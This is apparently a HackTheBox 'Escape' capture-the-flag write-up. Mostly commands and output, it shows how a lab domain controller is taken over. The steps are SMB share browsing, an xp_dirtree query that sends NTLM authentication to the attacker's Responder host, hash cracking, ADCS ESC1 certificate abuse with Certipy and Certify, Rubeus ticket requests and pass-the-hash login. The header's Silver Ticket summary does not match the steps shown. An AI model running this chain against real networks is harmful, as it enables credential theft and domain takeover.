WriteupsHTB — Escape
ADMediumWindows
HTB — Escape
MSSQL Silver Ticket attack via SPN enumeration. Responder captures NTLMv2 hash from SQL query, certificate auth for Domain Admin.
November 19, 2024HackTheBox
#AD#MSSQL#Silver Ticket#ADCS
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.202
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 22:30 EST
Nmap scan report for 10.10.11.202
Host is up (0.024s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-20 11:32:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-20T11:34:10+00:00; +8h00m38s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-11-20T11:34:11+00:00; +8h00m38s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.202:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2024-11-20T11:34:10+00:00; +8h00m38s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.202:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-20T11:28:31
|_Not valid after: 2054-11-20T11:28:31
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-11-20T11:34:10+00:00; +8h00m38s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Not valid before: 2024-01-18T23:03:57
|_Not valid after: 2074-01-05T23:03:57
|_ssl-date: 2024-11-20T11:34:11+00:00; +8h00m38s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49708/tcp open msrpc Microsoft Windows RPC
49727/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-11-20T11:33:34
|_ start_date: N/A
|_clock-skew: mean: 8h00m37s, deviation: 0s, median: 8h00m37s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 24.06 ms 10.10.14.1
2 24.55 ms 10.10.11.202
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.33 seconds445/tcp open microsoft-ds?
sh
445/tcp open microsoft-ds?sh
smbclient -N -L \\\\10.10.11.202
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
SQL Server Procedures.pdf
sh
mbclient \\\\10.10.11.202\\Public
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022sh
smb: \> get "SQL Server Procedures.pdf"txt
Bonus
For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with
user PublicUser and password GuestUserCantWrite1 .
Refer to the previous guidelines and make sure to switch the "Windows Aucreds
PublicUser:GuestUserCantWrite1
mssql
sh
impacket-mssqlclient PublicUser:'GuestUserCantWrite1'@sequel.htb
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commandsresponder
sh
sudo responder -I tun0 -dwPvsh
SQL (PublicUser guest@master)> EXEC master..xp_dirtree '\\10.10.14.2\share\'sh
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:c5dd59998797d94b:7BD3915B93A3B94C18E060758242F6C9:010100000000000000C48299E43ADB01089A8FA7D05911FF00000000020008003500450033004D0001001E00570049004E002D00350054004C004300500057004200500051005400410004003400570049004E002D00350054004C00430050005700420050005100540041002E003500450033004D002E004C004F00430041004C00030014003500450033004D002E004C004F00430041004C00050014003500450033004D002E004C004F00430041004C000700080000C48299E43ADB0106000400020000000800300030000000000000000000000000300000D783B35CB60A6937C255449961C1DFDC9CE855A37D186E2F22348DA4F97C97100A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310034002E0032000000000000000000hashcat
sh
hashcat -m 5600 sql_svc.ntlmv2 /usr/share/wordlists/rockyou.txt
SQL_SVC::sequel:c5dd59998797d94b:7bd3915b...:010100000000000000c48299e43adb01089a8fa7d05911ff00000000020008003500450033004d0001001e00570049004e002d00350054004c004300500057004200500051005400410004003400570049004e002d00350054004c00430050005700420050005100540041002e003500450033004d002e004c004f00430041004c00030014003500450033004d002e004c004f00430041004c00050014003500450033004d002e004c004f00430041004c000700080000c48299e43adb0106000400020000000800300030000000000000000000000000300000d783b35cb60a6937c255449961c1dfdc9ce855a37d186e2f22348da4f97c97100a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310034002e0032000000000000000000:REGGIE1234ronniecreds
SQL_SVC:REGGIE1234ronnie
mssql
sh
impacket-mssqlclient SQL_SVC:'REGGIE1234ronnie'@sequel.htb -windows-authevil-winrm
sh
evil-winrm -i 10.10.11.202 -u SQL_SVC -p 'REGGIE1234ronnie'logs
sh
*Evil-WinRM* PS C:\SQLServer\logs> cat ERRORLOG.BAKsh
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]creds
Ryan.Cooper:NuclearMosquito3
sh
╭─root@parrot /home/sake/htb/Escape
╰─# nxc winrm 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3' 2 ↵
WINRM 10.10.11.202 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
WINRM 10.10.11.202 5985 DC [+] sequel.htb\Ryan.Cooper:NuclearMosquito3 (Pwn3d!)evil-winrm
sh
evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p 'NuclearMosquito3'user.txt
sh
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> cat user.txt
11a7df24...sh
*Evil-WinRM* PS C:\Users\Ryan.Cooper> upload /opt/windows/SharpHound.exe sh
*Evil-WinRM* PS C:\Users\ryan.cooper> .\SharpHound.exe -c All --zipfilename sequel.htbsh
*Evil-WinRM* PS C:\Users\ryan.cooper> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448certipy
- https://github.com/ly4k/Certipy
sh
/usr/local/bin/certipy find -u ryan.cooper@sequel.htb -p 'NuclearMosquito3' -dc-ip 10.10.11.202ESC1
sh
"Certificate Templates": {
"0": {
"Template Name": "UserAuthentication",
"Display Name": "UserAuthentication",
"Certificate Authorities": [
"sequel-DC-CA"
],
"Enabled": true,
"Client Authentication": true,
"Enrollment Agent": false,
"Any Purpose": false,
"Enrollee Supplies Subject": true,
"Certificate Name Flag": [
"EnrolleeSuppliesSubject"
],
"Enrollment Flag": [
"PublishToDs",
"IncludeSymmetricAlgorithms"
],
"Private Key Flag": [
"ExportableKey"
],
"Extended Key Usage": [
"Client Authentication",
"Secure Email",
"Encrypting File System"
],
"Requires Manager Approval": false,
"Requires Key Archival": false,
"Authorized Signatures Required": 0,
"Validity Period": "10 years",
"Renewal Period": "6 weeks",
"Minimum RSA Key Length": 2048,
"Permissions": {
"Enrollment Permissions": {
"Enrollment Rights": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Domain Users",
"SEQUEL.HTB\\Enterprise Admins"
]
},
"Object Control Permissions": {
"Owner": "SEQUEL.HTB\\Administrator",
"Write Owner Principals": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins",
"SEQUEL.HTB\\Administrator"
],
"Write Dacl Principals": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins",
"SEQUEL.HTB\\Administrator"
],
"Write Property Principals": [
"SEQUEL.HTB\\Domain Admins",
"SEQUEL.HTB\\Enterprise Admins",
"SEQUEL.HTB\\Administrator"
]
}
},
"[!] Vulnerabilities": {
"ESC1": "'SEQUEL.HTB\\\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication"
}sh
/usr/local/bin/certipy req -username ryan.cooper@sequel.htb -password 'NuclearMosquito3' -ca sequel-DC-CA -template UserAuthentication -upn administrator@sequel.htb -dc-ip 10.10.11.202
Certipy v4.8.2 - by Oliver Lyak (ly4k)
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.12) or chardet (5.1.0)/charset_normalizer (2.0.12) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 15
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'sh
/usr/local/bin/certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb -target sequel.htb -ca sequel-dc-ca -template UserAuthentication
Certipy v4.8.2 - by Oliver Lyak (ly4k)
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning: urllib3 (1.26.12) or chardet (5.1.0)/charset_normalizer (2.0.12) doesn't match a supported version!
warnings.warn("urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported "
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 17
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
sh
certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC1-Test -upn administrator@corp.local -dns dc.corp.localsh
certipy req -u ryan.cooper@sequel.htb -p NuclearMosquito3 -upn administrator@sequel.htb
-target sequel.htb -ca sequel-dc-ca -template UserAuthenticationsh
sudo ntpdate -u dc.sequel.htbsh
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload /opt/windows/Certify.exesh
./certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administratorsh
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ./certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 22
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAzUXD5T28L30ODf2ZTTYiGafRtvuRv3FYdGqAYdalrDGILggB
52hy0ip6EW/6xkNPtezCIxz1qWKB3CVWQ9hpi2J+3wtZJElnP5T8TrsU8SCVt0UG
GNDhVo2cbwrhM7/gjx+pPvAeXHxEmwnmhKkiv9wBt56SCGyYfi6Kbdve6QANqZ/p
ovkgvFWAuCjdl+0jLeOMAjTF+BZ3qwZh7u3lJ1q+yoKtG4P+uJSwHrDazFw3IJW3
HIamrjM7XttWRYL0LtVI1bGd3jZRQ8Zp9ItREb8zxlzSw0FGsYYY3rCv/UfI2Hfx
FUbvVk3qXMUV+dbZ7pIzLIS4ucg26mvwkAVBKQIDAQABAoIBAEmSRKjoHIekuaHY
D9b1nPk3BdoghldoR3zKIyNt7EkwI4/j/NK0w9qBsOiJCwd+XpZkuhwdqArCrKp7
k1STvxhe//vvNE7mJCRMwLVzJglaVW6vRYUlcG42KSg/bQHANrr1bRKKu0cInwo2
XTGU8Uh0kQT/x3VPfsRS5/iCAn3dit/0cWAJRAff1TGsnXKgnGGb2p6CC17NnrWm
r5g5EdqDbNoH0F8W1Tc8PCybMM8hcvpci39hRmBB2rVunxkOL7jSvkdG0GUd1bat
FXXi7gnSjPYo/cK2wFtb0igs3oxQO5g6VXQaCfUNpRl5sSLr+MpLDdNiEU4U8f4g
yD3AtAUCgYEA/YLOL5LBi03JYzXf/wLQBLOHtqiymEs9YrtZxrKrwsHUrjAcVYf9
YCxuzSVKeRchWrKLI3PUa8fmpk2QGSEakz5m54eYaa9zJWp1pCLfxSsVvnrQd1rZ
Xjk1R+YgqfXNjRrUzy455TDmM06szpKzMOm0IfdvRSAbUlUPZ8xJKFsCgYEAz0m2
ppqaIRNZLIWWy0Gjy19yfUXtW5UOYb9YUuxioi19hvVPQ99YlG7FYojYSmGUVp4Q
9wjII6ACxAFVpvjoaIkVnqzwJuXbvSUhFBVCe9E09AdP2SZJ5zRcOLzZJWTLcNLK
3JqO8NlkEr6icjpo5yZUBdMHeM7psi/dOOdik8sCgYEA+zOec+2L8ymFINXFu79h
uQbct9a6AcascSUMdKOfJ0FCKchqiyZRn/bnZEhLX2nYFzNMRDkGiDZxCuFYpE31
M2pmNY5bLH46Lx0qrRYRfiKPTUwNPfe75G3zqecS/tcec2/e59z6aWzm7nhLK/aZ
sSIi6HVywKBr8k1vEn+PDnkCgYEAkZuiJh3rrtg8h72/Uz/kovOFJOJ9/RsTYy5a
CMXr8ygpSSgAahj1zC6TkMe3x2gMH1whZqZQkFXSG4UkeYnXF7dT7IZmm6xTUuZF
+imE7hzjKZgJSuxOdY6eSWy+zDmlfrdTsOsRBbZvSYuH6N2G2vhdhUnbsc0G9BgT
OemvoUkCgYBarenaloG2RikxOPLcIJu1IPrI7+GbUoVQMwCs1d4KhuMtw4GlUswP
LXmQOR6qqfyjquqaOSeKOopH9rBxMWz0NNEEj3wrjd7FuRBwn04TBFNjnVQOcucG
Y0A4mU55xhbAWHvyTGyX42Gr4c1wwyzcgSBzmYE//rUkR5053L1/KQ==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAABZ1dbHfVPiaBAAAAAAAFjANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjQxMTIxMDczMTIyWhcNMzQxMTE5
MDczMTIyWjBTMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYG
c2VxdWVsMQ4wDAYDVQQDEwVVc2VyczEUMBIGA1UEAxMLUnlhbi5Db29wZXIwggEi
MA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDNRcPlPbwvfQ4N/ZlNNiIZp9G2
+5G/cVh0aoBh1qWsMYguCAHnaHLSKnoRb/rGQ0+17MIjHPWpYoHcJVZD2GmLYn7f
C1kkSWc/lPxOuxTxIJW3RQYY0OFWjZxvCuEzv+CPH6k+8B5cfESbCeaEqSK/3AG3
npIIbJh+Lopt297pAA2pn+mi+SC8VYC4KN2X7SMt44wCNMX4FnerBmHu7eUnWr7K
gq0bg/64lLAesNrMXDcglbcchqauMzte21ZFgvQu1UjVsZ3eNlFDxmn0i1ERvzPG
XNLDQUaxhhjesK/9R8jYd/EVRu9WTepcxRX51tnukjMshLi5yDbqa/CQBUEpAgMB
AAGjggLsMIIC6DA9BgkrBgEEAYI3FQcEMDAuBiYrBgEEAYI3FQiHq/N2hdymVof9
lTWDv8NZg4nKNYF338oIhp7sKQIBZQIBBDApBgNVHSUEIjAgBggrBgEFBQcDAgYI
KwYBBQUHAwQGCisGAQQBgjcKAwQwDgYDVR0PAQH/BAQDAgWgMDUGCSsGAQQBgjcV
CgQoMCYwCgYIKwYBBQUHAwIwCgYIKwYBBQUHAwQwDAYKKwYBBAGCNwoDBDBEBgkq
hkiG9w0BCQ8ENzA1MA4GCCqGSIb3DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYF
Kw4DAgcwCgYIKoZIhvcNAwcwHQYDVR0OBBYEFAa+cJ2I/p/ElpnJL8ziFqFBwZ/l
MCgGA1UdEQQhMB+gHQYKKwYBBAGCNxQCA6APDA1BZG1pbmlzdHJhdG9yMB8GA1Ud
IwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8EgbwwgbkwgbaggbOg
gbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFz
ZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBvQYIKwYBBQUHAQEE
gbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1ZWwtREMtQ0EsQ049
QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNv
bmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRpZmljYXRlP2Jhc2U/
b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF
AAOCAQEArMIXbrSsF3ob21jhn7Xk3ACPXUlKcZmvTPYTy9ZYDA2l3tBGB+DJW32C
TcRopdyp4KcenWQF+zHi5pJGzENjS3ifC4Y8koueIBPG7OMJZ2Lua7lmr85bCz+5
GUZDuLNYEEIuFY8LV7+K2jTvdLgKAIci/ZTxpVnX6SI5Rpg7Zc6Ou1bIhx8saL8M
JJPXr3qYeAnveLMN5HkyCvTErXHZzjT4Y5ix7JOKACXlLfT6zDoTDLEw8PLpRllA
nXsAzh5Oa1Vsh4twYYlap3hs42ZngjHlxH750KdQU+TvlR7rETc/S8Y9vbe+Us2h
TpQjysTEWfe2YmgYX1fcZfKsQM2zoQ==
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx- save entire output from the certificate
- skip password
sh
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfxsh
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload /home/sake/htb-labs/Escape/cert.pfxsh
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload /opt/windows/Rubeus.exesh
.\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\Documents\cert.pfx /getcredentials /show /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.0.2
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::106a:3318:bb4:4889%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : administrator
UserRealm : SEQUEL.HTB
StartTime : 11/20/2024 11:52:46 PM
EndTime : 11/21/2024 9:52:46 AM
RenewTill : 11/27/2024 11:52:46 PM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : K1/qkSKrODCfU+AvCUmUfA==
ASREP (key) : B8FB799BD34A0B4DFAB11761B50CD1B2
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
admin ntlm
sh
A52F78E4C751E5F5E17E1E9F3E58F4EEsh
evil-winrm -i 10.10.11.202 -u administrator -H 'A52F78E4C751E5F5E17E1E9F3E58F4EE'sh
evil-winrm -i 10.10.11.202 -u administrator -H 'A52F78E4C751E5F5E17E1E9F3E58F4EE'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administratorroot.txt
sh
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
e877636f...Up next
EasyNov 2024
HTB — ServMon
Anonymous FTP reveals NVMS-1000 path traversal note. LFI reads credentials file, SSH pivoting to access NSClient++ for SYSTEM.
Read writeup
MediumNov 2024
HTB — Sniper
PHP RFI via language parameter loads SMB share for RCE. Lateral movement via credential in web config. CHM file drops reverse shell as Administrator.
Read writeup
EasyNov 2024
HTB — Keeper
Request Tracker default credentials expose SSH public key in ticket. KeePass 2.x CVE-2023-32784 memory dump extracts master password for root SSH key.
Read writeup